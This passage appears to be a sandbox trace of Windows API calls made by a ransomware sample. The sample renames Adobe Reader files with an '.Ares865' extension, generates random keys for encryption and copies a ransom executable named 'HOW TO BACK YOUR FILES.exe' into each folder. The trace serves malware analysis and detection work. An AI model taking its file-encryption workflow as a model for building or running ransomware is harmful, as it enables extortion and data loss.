param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif.Ares865") returned 70 [0169.585] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tr.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tr.gif.ares865"), dwFlags=0x1) returned 1 [0169.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tr.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0169.588] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.608] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.609] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.609] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.610] lstrcpyW (in: lpString1=0x2cce470, lpString2="trash.gif" | out: lpString1="trash.gif") returned="trash.gif" [0169.610] lstrlenW (lpString="trash.gif") returned 9 [0169.610] lstrlenW (lpString="Ares865") returned 7 [0169.610] lstrcmpiW (lpString1="ash.gif", lpString2="Ares865") returned 1 [0169.610] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif.Ares865") returned 73 [0169.610] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\trash.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\trash.gif.ares865"), dwFlags=0x1) returned 1 [0169.612] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\trash.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.612] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1161) returned 1 [0169.612] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.613] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.613] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.622] lstrcpyW (in: lpString1=0x2cce470, lpString2="turnOffNotificationInAcrobat.gif" | out: lpString1="turnOffNotificationInAcrobat.gif") returned="turnOffNotificationInAcrobat.gif" [0169.622] lstrlenW (lpString="turnOffNotificationInAcrobat.gif") returned 32 [0169.623] lstrlenW (lpString="Ares865") returned 7 [0169.623] lstrcmpiW (lpString1="bat.gif", lpString2="Ares865") returned 1 [0169.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif.Ares865") returned 96 [0169.623] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationinacrobat.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationinacrobat.gif.ares865"), dwFlags=0x1) returned 1 [0169.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInAcrobat.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationinacrobat.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.625] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=824) returned 1 [0169.625] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.626] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.626] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.643] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.644] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.644] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.644] lstrcpyW (in: lpString1=0x2cce470, lpString2="turnOffNotificationInTray.gif" | out: lpString1="turnOffNotificationInTray.gif") returned="turnOffNotificationInTray.gif" [0169.644] lstrlenW (lpString="turnOffNotificationInTray.gif") returned 29 [0169.644] lstrlenW (lpString="Ares865") returned 7 [0169.644] lstrcmpiW (lpString1="ray.gif", lpString2="Ares865") returned 1 [0169.645] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif.Ares865") returned 93 [0169.645] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationintray.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationintray.gif.ares865"), dwFlags=0x1) returned 1 [0169.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOffNotificationInTray.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnoffnotificationintray.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.647] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=995) returned 1 [0169.647] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.661] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.662] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.662] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.663] lstrcpyW (in: lpString1=0x2cce470, lpString2="turnOnNotificationInAcrobat.gif" | out: lpString1="turnOnNotificationInAcrobat.gif") returned="turnOnNotificationInAcrobat.gif" [0169.663] lstrlenW (lpString="turnOnNotificationInAcrobat.gif") returned 31 [0169.663] lstrlenW (lpString="Ares865") returned 7 [0169.663] lstrcmpiW (lpString1="bat.gif", lpString2="Ares865") returned 1 [0169.663] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif.Ares865") returned 95 [0169.663] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationinacrobat.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationinacrobat.gif.ares865"), dwFlags=0x1) returned 1 [0169.665] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationinacrobat.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.665] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=831) returned 1 [0169.665] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.666] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.666] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.674] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.675] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.675] lstrcpyW (in: lpString1=0x2cce470, lpString2="turnOnNotificationInTray.gif" | out: lpString1="turnOnNotificationInTray.gif") returned="turnOnNotificationInTray.gif" [0169.675] lstrlenW (lpString="turnOnNotificationInTray.gif") returned 28 [0169.675] lstrlenW (lpString="Ares865") returned 7 [0169.675] lstrcmpiW (lpString1="ray.gif", lpString2="Ares865") returned 1 [0169.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif.Ares865") returned 92 [0169.676] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationintray.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationintray.gif.ares865"), dwFlags=0x1) returned 1 [0169.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInTray.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationintray.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1002) returned 1 [0169.678] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.684] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.685] lstrcpyW (in: lpString1=0x2cce470, lpString2="warning.gif" | out: lpString1="warning.gif") returned="warning.gif" [0169.685] lstrlenW (lpString="warning.gif") returned 11 [0169.685] lstrlenW (lpString="Ares865") returned 7 [0169.685] lstrcmpiW (lpString1="ing.gif", lpString2="Ares865") returned 1 [0169.685] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif.Ares865") returned 75 [0169.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\warning.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\warning.gif.ares865"), dwFlags=0x1) returned 1 [0169.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\warning.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\warning.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=369) returned 1 [0169.693] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.694] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.694] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.703] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.705] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.705] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.706] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" [0169.706] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins" [0169.706] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0169.706] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\how to back your files.exe"), bFailIfExists=1) returned 0 [0169.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0169.708] GetLastError () returned 0x0 [0169.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0169.708] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffc0b80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5483cc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5483cc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0169.708] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0169.708] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0169.708] lstrcpyW (in: lpString1=0x2cce474, lpString2="ADMPlugin.apl" | out: lpString1="ADMPlugin.apl") returned="ADMPlugin.apl" [0169.708] lstrlenW (lpString="ADMPlugin.apl") returned 13 [0169.708] lstrlenW (lpString="Ares865") returned 7 [0169.708] lstrcmpiW (lpString1="gin.apl", lpString2="Ares865") returned 1 [0169.709] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl.Ares865") returned 79 [0169.709] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl.ares865"), dwFlags=0x1) returned 1 [0169.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1396224) returned 1 [0169.711] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.831] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.832] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.832] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.851] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" [0169.851] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services" [0169.851] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0169.851] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\how to back your files.exe"), bFailIfExists=1) returned 0 [0169.853] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0169.853] GetLastError () returned 0x0 [0169.854] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0169.854] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x820095e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54862d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54862d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0169.854] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0169.854] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0169.854] lstrcpyW (in: lpString1=0x2cce472, lpString2="DEXShare.spi" | out: lpString1="DEXShare.spi") returned="DEXShare.spi" [0169.854] lstrlenW (lpString="DEXShare.spi") returned 12 [0169.854] lstrlenW (lpString="Ares865") returned 7 [0169.854] lstrcmpiW (lpString1="are.spi", lpString2="Ares865") returned -1 [0169.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi.Ares865") returned 77 [0169.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi.ares865"), dwFlags=0x1) returned 1 [0169.856] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1055685) returned 1 [0169.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.857] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.963] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.978] lstrcpyW (in: lpString1=0x2cce472, lpString2="Services.cfg" | out: lpString1="Services.cfg") returned="Services.cfg" [0169.978] lstrlenW (lpString="Services.cfg") returned 12 [0169.978] lstrlenW (lpString="Ares865") returned 7 [0169.978] lstrcmpiW (lpString1="ces.cfg", lpString2="Ares865") returned 1 [0169.978] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg.Ares865") returned 77 [0169.978] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg.ares865"), dwFlags=0x1) returned 1 [0169.983] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\Services.cfg.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\services.cfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32633) returned 1 [0169.983] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.997] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 